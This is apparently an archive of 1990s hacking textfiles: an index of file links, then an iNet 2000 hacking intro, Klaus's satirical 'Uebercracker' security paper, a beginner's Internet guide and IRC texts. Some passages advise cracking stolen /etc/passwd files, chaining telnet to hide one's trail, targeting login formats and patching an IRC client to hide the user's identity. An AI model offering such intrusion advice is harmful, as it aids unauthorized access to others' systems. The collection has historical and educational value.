=> gemini://informis.land/textfiles/hacking/INTERNET/iphijack.txt [ 46396] A Simple Attack Against TCP, by Laurent Joncheray
=> gemini://informis.land/textfiles/hacking/INTERNET/irc.txt [ 2703] How Do I Hack ChanOP on IRC by Lord Somer
=> gemini://informis.land/textfiles/hacking/INTERNET/ircfaq.txt [ 16758] The IRC Frequently Asked Questions (FAQ) (Junary 15, 1996)
=> gemini://informis.land/textfiles/hacking/INTERNET/irchack.hac [ 14381] Hacking IRC the Definitive Guide
=> gemini://informis.land/textfiles/hacking/INTERNET/irk.txt [ 1739] Irc Bouncing Around Klines Using a unix Shell by Lord Somer (August 5, 1997)
=> gemini://informis.land/textfiles/hacking/INTERNET/jul93blt.txt [ 16431] Connecting to the Internet: Security Considerations
=> gemini://informis.land/textfiles/hacking/INTERNET/mnemonic.txt [ 9692] The PC-Pursuit Service Availability
=> gemini://informis.land/textfiles/hacking/INTERNET/na.txt [ 247107] Anonymity on the Internet, by L. Detweiler (April 30, 1994)
=> gemini://informis.land/textfiles/hacking/INTERNET/netcat.txt [ 63679] Netcat Rules the Net Version 1.0
=> gemini://informis.land/textfiles/hacking/INTERNET/netware1.txt [ 5670] Stuboy's Netware Hacking Tips, Compliments of StuBoy (1997)
=> gemini://informis.land/textfiles/hacking/INTERNET/new-user [ 2048] PC-Pursuit: New User Information
=> gemini://informis.land/textfiles/hacking/INTERNET/pingdumb.txt [ 5851] Pinging For Dummies, by ESQ (2000)
=> gemini://informis.land/textfiles/hacking/INTERNET/pod.txt [ 5746] Large Packet Attacks, A.K.A. the Ping of Death
=> gemini://informis.land/textfiles/hacking/INTERNET/proxy.txt [ 3474] Using Web Proxies to Disguise your IP Address by Hardcore Pawn
=> gemini://informis.land/textfiles/hacking/INTERNET/rates [ 3072] PC-Pursuit Rate Schedule (July 1, 1989)
=> gemini://informis.land/textfiles/hacking/INTERNET/rvprimer.txt [ 10979] The Racal_Vadic Primer v1.0 (For PC-Pursuit)
=> gemini://informis.land/textfiles/hacking/INTERNET/smtp.txt [ 2545] Mail Spoofing Explained for the Beginner
=> gemini://informis.land/textfiles/hacking/INTERNET/sniffer.txt [ 19746] FAQ: The Sniffer Frequently Asked Questions Version 1.7
=> gemini://informis.land/textfiles/hacking/INTERNET/spoof.txt [ 13411] Defending Against Sequence Number Attacks by S. Bellovin of AT&T Research (May 1996)
=> gemini://informis.land/textfiles/hacking/INTERNET/spoofing.txt [ 22066] Web Spoofing: An Internet Con Game by Edward W. Felten, Dirk Balfanz, Drew Dean, and Dan S. Wallach
=> gemini://informis.land/textfiles/hacking/INTERNET/tc [ 10240] Terms and Conditions of Use for PC-Pursuit Service
=> gemini://informis.land/textfiles/hacking/INTERNET/td.txt [ 11195] Telenet dialups for the US by HackerZ Hideout
=> gemini://informis.land/textfiles/hacking/INTERNET/tele_iti.txt [ 31420] Telenet ITI Parameters for PC-Pursuit
=> gemini://informis.land/textfiles/hacking/INTERNET/terminal.txt [ 13342] Terminal Identifiers List
=> gemini://informis.land/textfiles/hacking/INTERNET/tips.txt [ 17685] Troubleshooting PC Pursuit Calls (January 18, 1997)
=> gemini://informis.land/textfiles/hacking/INTERNET/unixwrap.txt [ 25638] TCP Wrapper: Network Monitoring, Access Control, and Booby Traps, by Wietse Venema
=> gemini://informis.land/textfiles/hacking/INTERNET/usa.asc [ 138303] List of Dial-In Numbers for PC Pursuit
=> gemini://informis.land/textfiles/hacking/INTERNET/usenethi.txt [ 4277] Some Advanced Usenet Hi-Jynx
=> gemini://informis.land/textfiles/hacking/INTERNET/waninfo.txt [ 9788] Jester Sluggo Presents an Insight on Wide Area Networks
=> gemini://informis.land/textfiles/hacking/INTERNET/world.asc [ 171453] Worldwide Phone Numbers of Dial-In to PC-Pursuit
=> gemini://informis.land/textfiles/hacking/INTERNET/yanoff.txt [ 44889] Special Internet Collections: Last Update 5/16/1994 by Scott Yanoff
+77
View File
@@ -0,0 +1,77 @@
The
-=[RoT]=-
Introduction to
Hacking
The
iNET 2000
Online Service
)()()()()()()()()()()()()
Written by
Deicide
on 04/05/93
-------------------------------
INTRODUCTION
iNet 2000, or as marketing people like to call it "the intelligence
network", is a Telecom Canada production, and comes off like another overblown
online service, such as Compuserve or Prodigy. It is, however, mainly
supposed to be business related. Although it does have the usual forums(SIGs
on other Online Services), files & bulliten's, they are all primarily based
around business in some manifestation.
Another interesting thing is that it is based almost entirely around
Packet-Switching Networks, in specific Datapac(because it's Telecom Canada's),
but also Sprintnet and Tymnet in the U.S.. While Compuserve and the majority
of other Online Services do have PSN Dialin NUA's(Network User Address), they
are usually based on local direct dialins. This is not the case with iNet
2000. iNet 2000 is only accessible from NUA's at this point, possibly an
attempt by Telecom Canada to raise awareness of their PSN.
Now, while there is not much to tell about hacking iNet, i will run
through how to identify the system, the User ID/Password format, and a few
of the working NUA's.
HACKING PROCEDURE
First off, for those anxious to get a feel for the system, here are a few
of the NUA's...
302079100067
302079100068
302087100024
302087100025
From within the Datapac system, the DNIC(3020) is not needed, but it is
required from other Packet-Switching Networks.
When you connect to an iNet 2000 NUA, the login prompt
User-id/Code D'usager:
The iNet 2000 userid's are usually in the format of JM.SMITH, or J.SMITH, as
in initials + surname. iNet will NOT inform you if this is incorrect. It will
proceed to the password prompt, which is
Password/Code de securite
The iNet 2000 password format is such
- Case Sensitive
- Between 6 & 8 Characters in length
- Must contain at least one alphabetic and one numeric character
- Must contain at least one special character(!,#,S,&,&,-, or *)
- The first character must be alphanumeric
And to add on that, the password MUST be changed within 3 months, or a prompt
for a new password will come up and force you to pick one.
Oh, and you can reach Customer Service at
1-800-267-8480
1-416-862-1717
If you think you can Social Engineer an account
CONCLUSION
As you can see, hacking iNet is rather futile, if not pointless. I always
wondered why people would spend hours hacking Online Service accounts so they
could spend 3 days or so downloading rad peedee programs and playing those
wicked online games. This service is even more boring, and even harder to
hack. My suggestion to the masses - Go hack a Unix(or HP3000 or whatever)
instead..
If you have any questions or comments you can find me at the -=RoT=- HQ's
listed below..
Deicide
6 ŸîîT š¤DäR The Cellar
-=[RoT]=- -=[RoT]=-
WHQ US HQ
(604) 824-0317 (401) PRI-VATE
+140
View File
@@ -0,0 +1,140 @@
A Guide to Internet Security:
Becoming an Uebercracker and Becoming an
UeberAdmin to stop Uebercrackers.
Author: Christopher Klaus
Date: December 5th, 1993.
Version 1.1
This is a paper will be broken into two parts, one showing 15 easy steps to becoming a uebercracker and the next part
showing how to become a ueberadmin and how to stop a uebercracker. A uebercracker is a term phrased by Dan Farmer to
refer to some elite (cr/h)acker that is practically impossible to keep out of the networks.
Here's the steps to becoming a uebercracker.
I.Relax and remain calm. Remember YOU are a Uebercracker.
II.If you know a little Unix, you are way ahead of the crowd and skip past step 3.
III.You may want to buy Unix manual or book to let you know what ls,cd,cat does.
IV.Read Usenet for the following groups: alt.irc, alt.security, comp.security.unix. Subscribe to Phrack@well.sf.ca.us to get
a background in uebercracker culture.
V.Ask on alt.irc how to get and compile the latest IRC client and connect to IRC.
VI.Once on IRC, join the #hack channel. (Whew, you are half-way there!)
VII.Now, sit on #hack and send messages to everyone in the channel saying "Hi, Whats up?". Be obnoxious to anyone else
that joins and asks questions like "Why cant I join #warez?"
VIII.(Important Step) Send private messages to everyone asking for new bugs or holes. Here's a good pointer, look around
your system for binary programs suid root (look in Unix manual from step 3 if confused). After finding a suid root binary,
(ie. su, chfn, syslog), tell people you have a new bug in that program and you wrote a script for it. If they ask how it
works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask them to trade for their get-root scripts.
IX.Make them send you some scripts before you send some garbage file (ie. a big core file). Tell them it is encrypted or it
was messed up and you need to upload your script again.
X.Spend a week grabbing all the scripts you can. (Dont forget to be obnoxious on #hack otherwise people will look down
on you and not give you anything.)
XI.Hopefully you will now have atleast one or two scripts that get you root on most Unixes. Grab root on your local
machines, read your admin's mail, or even other user's mail, even rm log files and whatever temps you. (look in Unix
manual from step 3 if confused).
XII.A good test for true uebercrackerness is to be able to fake mail. Ask other uebercrackers how to fake mail (because
they have had to pass the same test). Email your admin how "layme" he is and how you got root and how you erased his
files, and have it appear coming from satan@evil.com.
XIII.Now, to pass into supreme eliteness of uebercrackerness, you brag about your exploits on #hack to everyone. (Make
up stuff, Remember, YOU are a uebercracker.)
XIV.Wait a few months and have all your notes, etc ready in your room for when the FBI, Secret Service, and other law
enforcement agencies confinscate your equipment. Call eff.org to complain how you were innocent and how you
accidently gotten someone else's account and only looked because you were curious. (Whatever else that may help,
throw at them.)
XV.Now for the true final supreme eliteness of all uebercrackers, you go back to #hack and brag about how you were
busted. YOU are finally a true Uebercracker.
Now the next part of the paper is top secret. Please only pass to trusted administrators and friends and even some trusted
mailing lists, Usenet groups, etc. (Make sure no one who is NOT in the inner circle of security gets this.)
This is broken down on How to Become an UeberAdmin (otherwise know as a security expert) and How to stop
Uebercrackers.
I.Read Unix manual ( a good idea for admins ).
II.Very Important. chmod 700 rdist; chmod 644 /etc/utmp. Install sendmail 8.6.4. You have probably stopped 60 percent
of all Uebercrackers now. Rdist scripts is among the favorites for getting root by uebercrackers.
III.Okay, maybe you want to actually secure your machine from the elite Uebercrackers who can break into any site on
Internet.
IV.Set up your firewall to block rpc/nfs/ip-forwarding/src routing packets. (This only applies to advanced admins who have
control of the router, but this will stop 90% of all uebercrackers from attempting your site.)
V.Apply all CERT and vendor patches to all of your machines. You have just now killed 95% of all uebercrackers.
VI.Run a good password cracker to find open accounts and close them. Run tripwire after making sure your binaries are
untouched. Run tcp_wrapper to find if a uebercracker is knocking on your machines. Run ISS to make sure that all your
machines are reasonably secure as far as remote configuration (ie. your NFS exports and anon FTP site.)
VII.If you have done all of the following, you will have stopped 99% of all uebercrackers. Congrads! (Remember, You are
the admin.)
VIII.Now there is one percent of uebercrackers that have gained knowledge from reading some security expert's mail
(probably gained access to his mail via NFS exports or the guest account. You know how it is, like the mechanic that
always has a broken car, or the plumber that has the broken sink, the security expert usually has an open machine.)
IX.Here is the hard part is to try to convince these security experts that they are not so above the average citizen and that
by now giving out their unknown (except for the uebercrackers) security bugs, it would be a service to Internet. They do
not have to post it on Usenet, but share among many other trusted people and hopefully fixes will come about and new
pressure will be applied to vendors to come out with patches.
X.If you have gained the confidence of enough security experts, you will know be a looked upto as an elite security
administrator that is able to stop most uebercrackers. The final true test for being a ueberadmin is to compile a IRC
client, go onto #hack and log all the bragging and help catch the uebercrackers. If a uebercracker does get into your
system, and he has used a new method you have never seen, you can probably tell your other security admins and get
half of the replies like - "That bug been known for years, there just isn't any patches for it yet. Here's my fix." and the
other half of the replies will be like - "Wow. That is very impressive. You have just moved up a big notch in my security
circle." VERY IMPORTANT HERE: If you see anyone in Usenet's security newsgroups mention anything about that
security hole, Flame him for discussing it since it could bring down Internet and all Uebercrackers will now have it and
the million other reasons to keep everything secret about security.
Well, this paper has shown the finer details of security on Internet. It has shown both sides of the coin. Three points I would
like to make that would probably clean up most of the security problems on Internet are as the following:
I.Vendors need to make security a little higher than zero in priority. If most vendors shipped their Unixes already secure
with most known bugs that have been floating around since the Internet Worm (6 years ago) fixed and patched, then
most uebercrackers would be stuck as new machines get added to Internet. (I believe Uebercracker is german for "lame
copy-cat that can get root with 3 year old bugs.") An interesting note is that if you probably check the mail alias for
"security@vendor.com", you will find it points to /dev/null. Maybe with enough mail, it will overfill /dev/null. (Look in
manual if confused.)
II.Security experts giving up the attitude that they are above the normal Internet user and try to give out information that
could lead to pressure by other admins to vendors to come out with fixes and patches. Most security experts probably
don't realize how far their information has already spread.
III.And probably one of the more important points is just following the steps I have outlined for Stopping a Uebercracker.
Resources for Security
Many security advisories are available from anonymous ftp cert.org. Ask archie to find tcp_wrapper, security programs. For
more information about ISS (Internet Security Scanner), email cklaus@shadow.net.
Acknowledgements
Thanks to the crew on IRC, Dan Farmer, Wietse Venema, Alec Muffet, Scott Miles, Scott Yelich, and Henri De Valois.
Copyright
This paper is Copyright 1993, 1994. Please distribute to only trusted people. If you modify, alter, disassemble, reassemble,
re-engineer or have any suggestions or comments, please send them to: cklaus@shadow.net
+261
View File
@@ -0,0 +1,261 @@
<-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><->
<-> <->
<-> The Beginner's Guide to Internet <->
<-> <->
<-> Written by Weapons Master <->
<-> <->
<-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><->
I remember the day I told one of my friends that I had hacked
some Unix accounts. "Five accounts!", I said. "I hacked five
unix accounts!"
"Well", my friend said, "I guess that's cool. What can you
do with a unix account?"
I thought for a minute. "Hmm... I dunno."
Well, that was a long time ago, and since then, I've been
learning what you can do with a unix account. The cool thing
about having an account on a unix is not the processing power of
the unix. Those things seem pretty slow, especially once you
have several users on the thing. The software on them generally
sucks, except for a couple cool things you can do. I mean the
unix OS is nice, and it's fun being able to run jobs in the
background, but it's really nothing to get excited about.
(Though I'm sure some Unix fanatics would disagree with me.)
Unless your system has access to internet. Then you've
stepped into a whole new world.
What can you do with internet? Well, here's the main things:
+ Send mail to anyone else on internet (includes Compuserve).
+ Call any other system on internet.
+ Chat with anyone on any system on internet.
+ Call many systems (several hundred) and download files.
+ Play multi-player games with other people.
+ Access outdials to call LD boards for free
Sounds pretty cool, huh? Damn straight. Before I talk about
how to do all of these things, I'll talk about what internet is
and how you can be a part of it.
There's an incredible number of unix systems worldwide, and
most of them are pretty powerful mainframes or minicomputers that
are connected to each other with high speed transfer lines and
dialups. All these systems combined, plus some outdials, vaxes,
and other assorted technogoodies make up internet. If you have
an account on one of these systems, then you have access to
internet and actually are a part of internet.
Everything on internet has an address. It can be stated in
two ways, mnemonics or numbers. Mnemonics looks something like
this: pogo.ai.mit.edu. This is the addess of one of the MIT
unixes. Numbers look like this: 192.55.239.132. See the
similarities?
Everybody on internet has an address. If I'm logged in on
that MIT unix I spoke of earlier, suppose under the account
"joe", my address would be joe@pogo.ai.mit.edu. If someone
wanted to leave me mail, they'd send it to that address.
So to be a part of internet and access it, you need to be
logged into a system on intrnet, usually a unix. How do you get
a unix account? Well, that's your problem. Most colleges and
universities have several unix systems. Many have guest
accounts, but if you can't find one of those, you'll probably
have to hack one. But that's no big deal, unix accounts are the
easiest things in the world to hack, especially if you already
have access to one account on the system. If possible though,
get your own. That way you can have your own little mailbox, and
there's less confusion. Sharing an account can be a pain.
So how do you do all those nifty things I spoke of above?
Well, in this article I'll give unix examples, because that's the
systems I work with most, and the ones you'll probably be working
on.
SENDING MAIL TO SOMEONE ELSE
This is easy, just type "mail <person's address>". Type your
message, and the last line is a line with just '.' and a cr. The
mail will be transferred from system to system until it gets to
where it's going. If it goes around for a while, and then
realizes that the address is false (i.e. no such thing as
frank.ai.ber.edu), it'll be returned to you, maybe within a few
minutes if you're mailing somebody on your system, maybe within a
day if it has to go all over the country. Mail is usually sent
within 24 hours, depending how far it has to go.
SEEING WHO IS LOGGED IN AT A SPECIFIC SYSTEM
Type "finger @<system address>", so "who @pogo.ai.mit.edu" would
see who is logged in on that system. This is useful to see if a
system is free, so you can hack it at will, or a system
administrator is there. Also good for seeing if one of your
friends is there, so you can chat with them.
GETTING INFORMATION ON A USER ON A SPECIFIC SYSTEM
The command is "finger <username>@<system address>", so
"finger joe@pogo.ai.mit.edu" would give you some info on joe,
such as when he last logged on, wether he is currently on the
system, his name, and some other stuff.
TALKING TO SOMEONE ELSE IN REAL-TIME
Two ways to do this. One is a two-way chat mode like you get
on boards. To do this, type "talk <username>@<system address>".
It'll page the person on the other end, and then they can type
"talk" and then your address. Then you have a two way chat mode.
If you just want to have a message appear on his console,
type "write <username>@<system address>". Then type the message
you want displayed, and then type ctrl-D. (At least that's what
it is on my system.) The guy on the other end will see "Message
from <so&so>", it'll beep, and then show your message.
CONNECTING TO REMOTE SYSTEMS
Use the Unix command "telnet". "telnet <system address>" will
connect you to a foreign system. Just typing "telnet" by itself
will get you to the telnet command mode. You'll see the
"telnet>" prompt. Then you can type "open <system address>", or
just abbreviate that to "o <system address>".
Anyway, when you call, you'll see "Trying...". If the system
exists, this shouldn't take more than a few seconds, unless
you're connecting to something in Europe or Australia. In any
event, at this point you can abort the attempt by typing ctrl-c,
or whatever the break key is on your system. When you see
"Connected", you know you've succeded, and it'll tell you the
terminal escape character, ctrl-[ on my system. Also, it may say
"Connection refused by foreign host." or something to that
effect. When you call a system, the system probably won't get
your username (though don't count on this), but will be informed
of where the call is coming from. Some systems only accept calls
from certain systems. Also, the system could be down for some
reason.
Once you've connected, you're communicating with the system
normally, albeit a little slower due to all the packet switching.
At any time you can type ctrl-[ (though your terminal escape
character may be something else), and see the "telnet>" prompt.
You can just hit enter, and resume your dialog. Or you can type
"close" or "c" to close the connection, or "q" to quit. You can
also do a shell escape, by typing "z". The telnet process will
be suspended, and you are back in a shell. When you wish to
resume, you can continue the telnet process by typing "%1".
Telnet is a hacker's best friend, because from a unix, you can
call another unix, and from there another, and completely obscure
your trail. It is almost impossible to even tell what part of
the country you are calling from, let alone trace you to your
home.
GETTING FILES FROM A REMOTE SYSTEM
There are many ways to do this, but I typically use FTP.
"ftp" is a Unix command that allows you to connect to remote
systems and leech their files. FTP is very similar to telnet in
command syntax, in that you can type "ftp <system address>", or
type "ftp" and enter an interactive ftp mode.
When you connect to a system, assuming successful connection,
you'll be greeted with:
Login: (name etc etc)
You DO NOT want to hit return, or the system will send your
username, and it won't work. Type "anonymous", as the majority
of systems support that. Next it'll ask you for password. Just
hit return, or type "anon". Hopefully, you'll be connected.
btw usually your username and system location are sent
anyway. If you're going to be ftping something sensitive, you
probably want to be on a guest account. That way the system will
only know that it's sending files to "guest@<whatever>", and
nothing can be traced back to you.
Once you're on, you'll be sitting at the ftp prompt of
"ftp>". There are a variety of commands you can use, mostly for
finding your way through the remote systems directory tree and
sending or recieving files. Here is a list of some of the more
useful:
quit :disconnect and quit ftp.
ls :show files in current directory. Shows names only.
ls -l :show files in current directory. Shows names, filesize, &
permissions.
cd <directory> :Change current directory. Syntax is exactly like
the cd command in unix, i.e. "cd .." will move you back one
directory, "cd /" will move you to the root directory, "cd
/usr/lib" will move you to the directory /usr/lib, and so forth.
recv <filename> :File is sent from the remote system to your
system. Wildcards are not allowed. The file will be copied into
your current directory.
mget <filename> :Like "recv" above, but wildcards are allowed.
However, confirmation is requested for each file.
? :list commands availabe in ftp.
Transfer times are extremely fast, as least to someone like
me with a 2400 baud modem. A 100k file might take eight seconds.
Times do vary though.
btw you probably don't need me to tell you this, but feel
free to ftp the /etc/passwd file from a remote system, and use a
password hacker to bust in the accounts. It's one of the best
uses of ftp.
PLAYING ONLINE GAMES ON A UNIX
This varies greatly from machine to machine. I've seen some
good multi-player games out there, and heard of many more.
Hopefully you can find a system with one. If not, my only
suggestion is to get the source somewhere, and try to compile it
on your machine (a tedious task).
PLACES TO CALL
So now that you know how to use all these tools, you need
someplace to ftp to or telnet from. Well, here are a few, but
this list only scratches the surface.
Guest Accounts: login
pogo.ai.mit.edu guest
geech.ai.mit.edu guest
churchy.ai.mit.edu guest
gnu.ai.mit.edu guest
Internet BBS's:
(All these places are PD, but that's life. But in my opinion,
there's only one place to call, and that's mars. It has multi-
user chat, a library with ALL the phracks, a good TelComm
section, and you can often find some elite people there. (If
not, you can rag on the lmaers.) Anyway, if you see a guy named
Weapons, say hi. It's probably me.)
address (mnemonic) (numeric) login details
* indicates that it recognizes rlogin option -l login correctly
vaxb.acs.unt.edu 129.120.1.4 bbs Small BBS for U of N. Texas
samba.acs.unc.edu 128.109.157.30 bbs *XBBS system
uafcseg.uark.edu 130.184.64.202 bbs ?U. of Arkansas; usenet, irc
mars.ee.msstate.edu 130.18.64.3 bbs *Full-screen (neat)
naval acad. bbs 131.121.161.71 <cr> ?Single-user system, so keep trying
tolsun.oulu.fi 128.214.5.6 box *Finland; IRC, Usenet
vtcosy.cns.vt.edu 128.173.5.10 --- ?Must apply for an account
quartz.rutgers.edu 128.6.4.8 bbs *Citadel system, very active
star96.nodak.edu 134.129.107.131 20 ?UnaXcess BBS
Libraries (Unix shareware, mostly):
melvyl.ucop.edu 31.0.0.11 California State libraries
also 31.0.0.13, 31.1.0.1, 31.3.0.1, 31.1.0.11
library.bu.edu 128.197.4.200 Boston Univ. Library
nike.cair.du.edu 130.253.1.14 login as carl
rlg.stanford.edu 36.54.0.18
nervm.nerdc.ufl.edu 128.227.128.80 contact fcla@nervm for auth. code
bootes.unm.edu 129.24.8.2 login as student0 through student7
emuvm1.cc.emory.edu 128.140.1.4 press <cr>, DIAL VTAM, LIB, press PF1
ctw.wesleyan.edu 129.133.21.251
lias.psu.edu 128.118.25.13 Use TERM to set termtype
vma.cc.cmu.edu 128.2.253.40 port 1
merit.edu 35.1.1.6 Which Host? mirlyn
delcat.udel.edu 128.175.13.6 Delcat
Thanks -
To The Coroner for being a good guy, and giving me information
when I least expect it.
To The Raging Golem for helping distribute my files.
To L. for a putting up a way cool board.
To D. for standing still in the Photon arena, so I could
shoot him a whole bunch of times and rack up a pretty good score.
by Weapons Master
Downloaded From P-80 Systems 304-744-2253
File diff suppressed because it is too large Load Diff
Binary file not shown.
File diff suppressed because it is too large Load Diff
+80
View File
@@ -0,0 +1,80 @@
Written by Lord Somer
www.lordsomer.com
14. How do I hack ChanOp on IRC?
Find a server that is split from the rest of IRC and create your own
channel there using the name of the channel you want ChanOp on. When that
server reconnects to the net, you will have ChanOp on the real channel. If
you have ServerOp on a server, you can cause it to split on purpose.
15. How do I modify the IRC client to hide my real username?
Get the IRC client from cs.bu.edu /irc/clients. Look at the source code
files irc.c and ctcp.c. The code you are looking for is fairly easy to
spot. Change it. Change the username code in irc.c and the ctcp information
code in ctcp.c. Compile and run your client.
Here are the diffs from a sample hack of the IRC client. Your client code
will vary slightly depending on what IRC client version you are running.
*** ctcp.c.old Wed Feb 10 10:08:05 1993
--- ctcp.c Fri Feb 12 04:33:55 1993
***************
*** 331,337 ****
struct passwd *pwd;
long diff;
int uid;
! char c;
/*
* sojge complained that ircII says 'idle 1 seconds'
--- 331,337 ----
struct passwd *pwd;
long diff;
int uid;
! char c, *fing;
/*
* sojge complained that ircII says 'idle 1 seconds'
***************
*** 348,354 ****
if (uid != DAEMON_UID)
{
#endif /* DAEMON_UID */
! if (pwd = getpwuid(uid))
{
char *tmp;
--- 348,356 ----
if (uid != DAEMON_UID)
{
#endif /* DAEMON_UID */
! if (fing = getenv("IRCFINGER"))
! send_ctcp_reply(from, ctcp->name, fing, diff, c);
! else if (pwd = getpwuid(uid))
{
char *tmp;
*** irc.c.old Wed Feb 10 06:33:11 1993
--- irc.c Fri Feb 12 04:02:11 1993
***************
*** 510,516 ****
malloc_strcpy(&my_path, "/");
if (*realname == null(char))
strmcpy(realname, "*Unknown*", REALNAME_LEN);
! if (*username == null(char))
{
if (ptr = getenv("USER"))
strmcpy(username, ptr, NAME_LEN);
--- 510,518 ----
malloc_strcpy(&my_path, "/");
if (*realname == null(char))
strmcpy(realname, "*Unknown*", REALNAME_LEN);
! if (ptr = getenv("IRCUSER"))
! strmcpy(username, ptr, NAME_LEN);
! else if (*username == null(char))
{
if (ptr = getenv("USER"))
strmcpy(username, ptr, NAME_LEN);
+372
View File
@@ -0,0 +1,372 @@
Subject: IRC Frequently Asked Questions (FAQ)
Date: 15 Jan 1996 16:06:21 GMT
Expires: 31 Jan 1996 23:55:00 GMT
Summary: This posting contains a list of Frequently Asked Questions
(and their answers) about IRC, Internet Relay Chat. Please read
this before posting to the alt.irc, alt.irc.ircii, or
alt.irc.questions newsgroups.
Archive-name: irc-faq
Version: 1.53
(1) What is IRC?
.IRC stands for "Internet Relay Chat". It was originally
written by Jarkko Oikarinen (jto@tolsun.oulu.fi) in 1988. Since starting
in Finland, it has been used in over 60 countries around the world. It
was designed as a replacement for the "talk" program but has become much
much more than that. IRC is a multi-user chat system, where people convene
on "channels" (a virtual place, usually with a topic of conversation) to
talk in groups, or privately. IRC is constantly evolving, so the way
things to work one week may not be the way they work the next. Read the
MOTD (message of the day) every time you use IRC to keep up on any new
happenings or server updates.
.IRC gained international fame during the 1991 Persian Gulf War,
where updates from around the world came accross the wire, and most irc
users who were online at the time gathered on a single channel to hear
these reports. IRC had similar uses during the coup against Boris Yeltsin
in September 1993, where IRC users from Moscow were giving live reports
about the unstable situation there.
(2) How is IRC set up?
.The user runs a "client" program (usually called 'irc') which
connects to the IRC network via another program called a "server".
Servers exist to pass messages from user to user over the IRC network.
(3) How do I use a client?
.First, check to see if irc is installed on your system. Type
"irc" from your prompt. If this doesn't work, ask your local systems
people if irc is already installed. This will save you the work of
installing it yourself.
.If an IRC client isn't already on your system, you either
compile the source yourself, have someone else on your machine compile
the source for you.
(4) Where can I get source for an IRC client?
.You can anonymous ftp to any of the following sites (use the
one closest to you): *** If you don't know what anonymous ftp is, ask
your local systems people to show you ***
UNIX client-> cs-ftp.bu.edu /irc/clients
. ftp.acsu.buffalo.edu /pub/irc
. ftp.funet.fi /pub/unix/irc
coombs.anu.edu.au /pub/irc
. ftp.informatik.tu-muenchen.de /pub/comp/networking/irc/clients
EMACS elisp-> cs-ftp.bu.edu /irc/clients/elisp
. ftp.funet.fi /pub/unix/irc/Emacs
ftp.informatik.tu-muenchen.de /pub/comp/networking/irc/clients
cs.hut.fi /pub/irchat
X11 client-> catless.ncl.ac.uk /pub
(Zircon) ftp.aud.alcatel.com /tcl/code
VMS -> cs-ftp.bu.edu /irc/clients/vms
. coombs.anu.edu.au /pub/irc/vmsirc
ftp.funet.fi /pub/unix/irc/vms
ftp.informatik.tu-muenchen.de /pub/net/irc
REXX client for VM-> cs-ftp.bu.edu /irc/clients/rxirc
ftp.informatik.uni-oldenburg.de /pub/irc/rxirc
ftp.informatik.tu-muenchen.de /pub/net/irc/VM
coombs.anu.edu.au /pub/irc/rxirc
ftp.funet.fi /pub/unix/irc/rxirc
MSDOS-> cs-ftp.bu.edu /irc/clients/pc/msdos
ftp.funet.fi /pub/unix/irc/msdos
MSWindows->.cs-ftp.bu.edu:/irc/clients/pc/windows
..ftp.demon.co.uk:/pub/ibmpc/win3/winsock/apps/wsirc
..ftp.demon.co.uk:/pub/ibmpc/win3/winsock/apps/mirc
OS/2->..cs-ftp.bu.edu:/irc/clients/pc/os2
..hobbes.nmsu.edu:/os2/network/tcpip
Macintosh-> cs-ftp.bu.edu /irc/clients/macintosh
("Homer" and mirrors.aol.com /pub/info-mac/comm/tcp
"ircle") ftp.funet.fi /pub/unix/irc/mac
ftp.ira.uka.de /pub/systems/mac
ircle only:.http://www.omroep.nl/~onno
Amiga->..gv.warped.com /pub/amiga/grapevine
..ftp.wustl.edu /pub/aminet/comm/net
..ftp.luth.se /pub/aminet/comm/net
..cs-ftp.bu.edu /irc/clients/amiga
(5) Which server do I connect my client to?
.It's usually best to try and connect to one geographically
close, even though that may not be the best. You can always ask when you
get on IRC. Here's a list of servers avaliable for connection:
USA:
..irc.bu.edu
..irc.colorado.edu
..mickey.cc.utexas.edu..
Canada:
..irc.mcgill.ca
Europe:
..irc.funet.fi
..cismhp.univ-lyon1.fr
..irc.ethz.ch
irc.nada.kth.se
..sokrates.informatik.uni-kl.de
bim.itc.univie.ac.at
Australia:
..jello.qabc.uq.oz.au
Japan:
..endo.wide.ad.jp
This is, by no means, a comprehensive list, but merely a start. Connect
to the closest of these servers and join the channel #irchelp
(6) What is the port to use to connect to IRC?
.In general, the port to use is 6667. Some servers listen to
other ports (most commonly in the 6660-6670 range), but *not* all. When in
doubt, use 6667.
(7) What's the username and password to connect to irc? I'm prompted for
login: and I don't know what to type! Sometimes when I try to connect
to IRC it just says "connection closed by foreign host. What gives?
.If you see "login:" then you are trying to use telnet to connect
to IRC. You should go back up and read (3) and (4). Nowhere in this FAQ
does it say you should use telnet to connect to an IRC server. You *must*
use a client. Read (4) to find out where to get a client, and (5) to find
out which server to connect to.
."connection closed by foreign host" indicates that you're trying
to telnet to irc, just as in the paragraph above. Again, you HAVE to use
a client!
(8) OK, I've got a client and I'm connected to a server, now what?
.It's probably best to take a look around and see what you want
to do first. All IRC commands start with a "/", and most are one word.
Typing /help will get you help information. /names will get you a list
of names, etc.
The output of /names is typically something like this->
Pub: #hack zorgo eiji Patrick fup htoaster
Pub: #Nippon @jircc @miyu_d
Pub: #nicole MountainD
Pub: #hottub omar liron beer Deadog moh pfloyd Dode greywolf SAMANTHA
(Note there are LOTS more channels than this, this is just sample
output -- one way to stop /names from being too large is doing /names
-min 20 which will only list channels with 20 or more people on it,
but you can only do this with the ircII client).
"Pub" means public (or "visible") channel. "hack" is the channel name.
"#" is the prefix. A "@" before someone's nickname indicates he/she is the
"Channel operator" (see (10)) of that channel. A Channel Operator is someone
who has control over a specific channel. It can be shared or not as the
first Channel Operator sees fit. The first person to join the channel
automatically receives Channel Operator status, and can share it with
anyone he/she chooses (or not). Another thing you might see is "Prv"
which means private. You will only see this if you are on that private
channel. No one can see Private channels except those who are on that
particular private channel.
(9) Now I've picked out a nice channel. How do I join that channel? And
what do I type once I get there? And when I'm done, how do I leave a
channel?
.To join a channel, type /join #channelname. That's it! Once you
get to the channel, you will see people talking. It will probably look
like this:
<Avalon> AUUG is on at the same time as LISA this year and is cheaper.
<Barron> backhaul those DS3s to Virginia ;)
<Barron> buy a farm
<FlashPYR> so is .us going to start charging $50/domain, too?
<Barron> or something
<Tolim> oops
Note that you will often come in in the *middle* of a conversation. Unless
you're familiar with the channel you may want to sit and watch it for a
minute or two to see what the conversation is about. Often the channel
name (for instance, #Twilight_Zone) has nothing to do with what
conversation goes on on the channel (#Twilight_Zone does *not* have
discussion about the TV show "Twilight Zone"). So if you join #baseball,
don't be surprised if you hear about the SuperBowl picks or even the
Rock-n-Roll Hall of Fame Museum!
To start talking, just type! And when you're done saying what you have to
say, just hit the [return] key. You can start with something simple like
